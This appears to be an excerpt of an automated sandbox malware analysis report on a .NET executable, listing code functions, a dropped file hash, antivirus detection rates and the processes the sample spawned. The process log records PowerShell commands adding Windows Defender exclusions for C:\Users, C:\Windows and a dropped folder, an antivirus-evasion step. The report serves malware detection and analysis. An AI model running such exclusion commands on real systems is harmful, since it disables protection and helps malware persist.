Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00410D11 14_2_00410D11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040ED31 14_2_0040ED31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040EDD1 14_2_0040EDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040EE71 14_2_0040EE71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040AE11 14_2_0040AE11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00408E11 14_2_00408E11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040CE31 14_2_0040CE31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00410EA1 14_2_00410EA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00410F41 14_2_00410F41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040EF51 14_2_0040EF51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040AF51 14_2_0040AF51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00408F11 14_2_00408F11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040CF31 14_2_0040CF31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042CFE1 14_2_0042CFE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040CFF1 14_2_0040CFF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F051 14_2_0040F051
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411071 14_2_00411071
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00409001 14_2_00409001
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040B031 14_2_0040B031
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040B0D1 14_2_0040B0D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004090E1 14_2_004090E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040D091 14_2_0040D091
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411141 14_2_00411141
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042D171 14_2_0042D171
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043F111 14_2_0043F111
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F121 14_2_0040F121
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00443131 14_2_00443131
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F1D1 14_2_0040F1D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004431D1 14_2_004431D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042B1E1 14_2_0042B1E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00409181 14_2_00409181
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040D251 14_2_0040D251
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411231 14_2_00411231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00409231 14_2_00409231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F2C1 14_2_0040F2C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004112D1 14_2_004112D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040B2E1 14_2_0040B2E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00443291 14_2_00443291
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00409351 14_2_00409351
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00443361 14_2_00443361
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040B371 14_2_0040B371
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040D301 14_2_0040D301
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043F311 14_2_0043F311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042B321 14_2_0042B321
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042D3C1 14_2_0042D3C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040D3D1 14_2_0040D3D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00413381 14_2_00413381
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F3B1 14_2_0040F3B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00443431 14_2_00443431
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004434F1 14_2_004434F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043F481 14_2_0043F481
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004094A1 14_2_004094A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040B4A1 14_2_0040B4A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00413561 14_2_00413561
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00409561 14_2_00409561
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040D501 14_2_0040D501
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411511 14_2_00411511
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040B5E1 14_2_0040B5E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F591 14_2_0040F591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043F591 14_2_0043F591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00443591 14_2_00443591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040D5B1 14_2_0040D5B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043F651 14_2_0043F651
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00443671 14_2_00443671
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00413601 14_2_00413601
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411621 14_2_00411621
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F631 14_2_0040F631
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042D6C1 14_2_0042D6C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040D6E1 14_2_0040D6E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043F6F1 14_2_0043F6F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040B681 14_2_0040B681
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042B691 14_2_0042B691
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004096B1 14_2_004096B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411741 14_2_00411741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F741 14_2_0040F741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00443741 14_2_00443741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00413711 14_2_00413711
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040B7C1 14_2_0040B7C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043F7E1 14_2_0043F7E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004437E1 14_2_004437E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F7F1 14_2_0040F7F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004097B1 14_2_004097B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040D801 14_2_0040D801
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F8C1 14_2_0040F8C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004098D1 14_2_004098D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043F8D1 14_2_0043F8D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040B8E1 14_2_0040B8E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040D8F1 14_2_0040D8F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042D8F1 14_2_0042D8F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411881 14_2_00411881
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004438A1 14_2_004438A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00413961 14_2_00413961
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043F971 14_2_0043F971
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004119D1 14_2_004119D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004139F1 14_2_004139F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040D9F1 14_2_0040D9F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004099F1 14_2_004099F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040F981 14_2_0040F981
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00443981 14_2_00443981
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411A71 14_2_00411A71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040BA01 14_2_0040BA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043FA01 14_2_0043FA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042DA01 14_2_0042DA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042DAC1 14_2_0042DAC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040BAF1 14_2_0040BAF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00409A81 14_2_00409A81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043FAA1 14_2_0043FAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042BAA1 14_2_0042BAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00413B01 14_2_00413B01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040DB01 14_2_0040DB01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411B31 14_2_00411B31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411BD1 14_2_00411BD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040DBD1 14_2_0040DBD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00413BE1 14_2_00413BE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040BB81 14_2_0040BB81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00409BA1 14_2_00409BA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042BBB1 14_2_0042BBB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042BC51 14_2_0042BC51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411C71 14_2_00411C71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040BC71 14_2_0040BC71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040FC31 14_2_0040FC31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00409CC1 14_2_00409CC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040DC81 14_2_0040DC81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043FC91 14_2_0043FC91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00413D11 14_2_00413D11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040BD11 14_2_0040BD11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040DD31 14_2_0040DD31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043FD31 14_2_0043FD31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040DDD1 14_2_0040DDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043FDD1 14_2_0043FDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042BDE1 14_2_0042BDE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00409DF1 14_2_00409DF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00403D81 14_2_00403D81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411D91 14_2_00411D91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040BDB1 14_2_0040BDB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043FE61 14_2_0043FE61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00411E31 14_2_00411E31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042BED1 14_2_0042BED1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040BE81 14_2_0040BE81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040DE81 14_2_0040DE81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00447F4F 14_2_00447F4F
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040BF71 14_2_0040BF71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040DFD1 14_2_0040DFD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00409FA1 14_2_00409FA1
Source: Joe Sandbox View Dropped File: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe 36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
Source: YYjRtxS70h.exe, 00000000.00000000.1485142901.0000000000652000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe Binary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: classification engine Classification label: mal88.evad.winEXE@21/24@4/5
Source: C:\Users\user\Desktop\YYjRtxS70h.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYjRtxS70h.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fimw0nw.epw.ps1
Source: YYjRtxS70h.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YYjRtxS70h.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\YYjRtxS70h.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: YYjRtxS70h.exe Virustotal: Detection: 62%
Source: YYjRtxS70h.exe ReversingLabs: Detection: 65%
Source: unknown Process created: C:\Users\user\Desktop\YYjRtxS70h.exe "C:\Users\user\Desktop\YYjRtxS70h.exe"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: sspicli.dll
